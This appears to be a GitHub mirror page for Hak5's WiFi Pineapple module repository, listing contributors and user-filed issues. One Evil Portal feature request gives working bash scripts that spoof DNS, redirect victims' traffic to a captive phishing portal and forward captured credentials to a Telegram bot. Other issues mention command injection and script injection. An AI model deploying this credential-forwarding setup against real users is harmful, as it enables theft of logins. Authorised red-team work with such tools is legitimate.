hak5 / pineapple-modules Goto Github PK
View Code? Open in Web Editor NEWThe Official WiFi Pineapple Module Repository for the WiFi Pineapple Mark VII
Home Page: https://wifipineapple.com
pineapple-modules's People
Contributors
![dependabot[bot] avatar](https://avatars.githubusercontent.com/in/29110?v=4 "dependabot[bot]")
Stargazers
Watchers
Forkers
thedragonkeeper sammansour father-stalin w1ldfir3 btcym maviharjit yagamishadow tsalomon jeffersonding benutzmich kurrt tubbz-alt lesaloon nervin79 darkfoxh4k3r johnsmitty80 caitif69 tobon-marco daddyty612 ossiemarks m00np1e wleyes arockia-arulnathan bsilv121 dsharp77 cedrico5000 antotek xchwarze lucaspbastos warcatdope thescruffinater koalav2 rakhithjk tylerstech2020 codassassin esk1llz korang johnverbiest zer0x0 1ndevelopment mobytoss gsy-pi synteki kashlegal masterscott s0u1sb4n3 4ngrb0d4 orgchao sailboat-anon adde88 controlthree darkmoon420 rumbis cluck0matic oncebyte oraclenaught cyberiaozsys7ems itrauco gr3ym4tt3r t4taru securecloud-biz taylorcowin bjoernfranck frankthetank908 s7ux-n3t blkcitymagician dleetd jacobdonenfeld noncreature0714 daveyshmave walkerbait noah-jorgensen dvdmrs09 bl4zkdevil stjordanis m4rkm4rk honkeykong89 sequoiasan emilio5639 kloudgeek trobbies synthetase demon-i386 helaz01 promethean15215394 makcanca 0gr3n1nj4 redfernsecurity jman420 ryan-cummings sosbgit grimmkr3w slaplaplaca1 cereallkiller 7-4-2043 muppetlabs999 0xs0nder lorenzoprimi kile myj10412pineapple-modules's Issues
Cannot install dependencies for MTR
On latest FW. 1.1.1.
ICS is working through USB
can install dependencies for all current other available modules.
installing dependencies for MTR fails.
No feedback from WEB interface other then notifications in notification bar
Notification is "Unable to install package. 1 May 2022 15:50:39 - Error - mtr"
would be nice to see which dependencies it is trying to install.
or an error message stating what error it is having.
or the location where error logs can be found.
Download to Local
Hi! How can I download a file from /root/handshake to my local drive?
[Evil Portal] Feature Request: notify-ng
Short story: Send captured credentials to telegram bot
A couple of years ago I made a bash script that helped me do a hot read of a file and every time that file was updated it sent a message from the telegram bot (https://vay3t.medium.com/creando-un-notificador-en-telegram-con-bash-b842490610)
With that idea I molded it to use it in the wifi pineapple and in this way have telegram notifications for red team campaigns.
/root/notify.sh
#!/bin/bash
function urlencode() {
# urlencode <string>
old_lc_collate=$LC_COLLATE
LC_COLLATE=C
local length="${#1}"
for (( i = 0; i < length; i++ )); do
local c="${1:$i:1}"
case $c in
[a-zA-Z0-9.~_-]) printf '%s' "$c" ;;
*) printf '%%%02X' "'$c" ;;
esac
done
LC_COLLATE=$old_lc_collate
}
token="TOKENOFBOT"
id="IDUSER"
if [ "$1" != "" ]; then
if [ ! -t 0 ]; then
msj="$(cat $1)"
fi
else
msj="beep"
fi
msj=$(urlencode "$msj")
url="https://api.telegram.org/bot$token/sendMessage"
curl -s -X POST "$url" -d chat_id="$id" -d text="$msj" &> /dev/null
if [ $? -ne 0 ]; then
echo "Error with bot"
fi/root/hotreader.sh
#!/bin/bash
file="/www/.logs"
lines=$(cat $file | wc -l)
###while inotifywait -q -e modify $file; do
inotifywait -q -m -e modify $file | while read filename event; do
linesNow=$(cat $file | wc -l)
tail -n $(($linesNow-$lines)) $file > /tmp/out.out && bash /root/notify.sh /tmp/out.out
lines=$linesNow
done/etc/init.d/evilportal
#!/bin/sh /etc/rc.common
# This is the auto-start script for EvilPortal
START=200
start() {
# Enable ip forward.
echo 1 > /proc/sys/net/ipv4/ip_forward
# Remove old authorized clients list
rm /tmp/EVILPORTAL_CLIENTS.txt
/etc/init.d/php7-fpm start
/etc/init.d/nginx start
# Start DNS MASQ to spoof * for unauthorized clients
dnsmasq --no-hosts --no-resolv --address=/#/172.16.42.1 -p 5353
# Symlink evilportal portal api
rm /www/captiveportal
ln -s /pineapple/ui/modules/evilportal/assets/api /www/captiveportal
# Run iptables commands
iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
iptables -t nat -A PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
sleep 10
bash /root/hotreader.sh &
}
stop() {
/etc/init.d/php7-fpm stop
/etc/init.d/nginx stop
kill $(netstat -plant | grep 5353 | awk '{print $NF}' | sed 's/\/dnsmasq//g' | head -n 1)
rm /www/captiveportal
iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
iptables -t nat -D PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
kill $(ps aux | grep hotreader.sh | head -2 | awk '{print $2}')
}
disable() {
rm /etc/rc.d/*evilportal
kill $(ps aux | grep hotreader.sh | head -2 | awk '{print $2}')
}I would like to work more but I'm not very good at developing web applications
Notes:
- The log file of the captured passwords should be blocked with an htaccess or any type of protection to the public from the web.
- It is possible that my solution is vulnerable to RCE due to the nature of Bash, but I think that using Python would be a good alternative
Command injection in nmap web gui
It's probably designed to work like this but still.
MDK4 not installing to proper directory on Pineapple enterprise
The pineapple MDK4 module installs correctly with its dependancies but when you perform an attack you get an '[Errno 2] No such file or directory: 'mdk4'' no matter the atack you run.
How do I inject scripts using the Wi-Fi pineapple
I know there are ways Iโm just trying to figure out the right one to use when associating the Wi-Fi pineapple with these other methods what tools are available
DNS Spoof
Does dns spoofing support now?
I think this is a useful function
[Evil Portal] Error restarting service after Client Authorized via Evil WPA
The Evil WPA AP issues IP addresses in the range of 172.16.42.100. Once a client connects and authorizes through the Evil Portal the NAT assignment to allow the client past the Captive Portal is added and causes this check to always return true.
This prevents the Evil Portal service from being recognized as successfully stopped and also prevents it from being restarted.
Using REST APIs from module.py
I'm developing some new modules for the Pineapple MK7, and I want to use some of the APIs from the python backend itself. However system does not include the requests library and it's really cumbersome to use urllib.requests.
Another problem, authentication. Even if we use the urllib.requests, there is no authentication so I can't access any of the APIs.
Specific API I was interested is pineap/handshakes.
I believe it is fundamental that backend is able to query some information from the pineapple service.
Thanks
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. ๐๐๐
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google โค๏ธ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.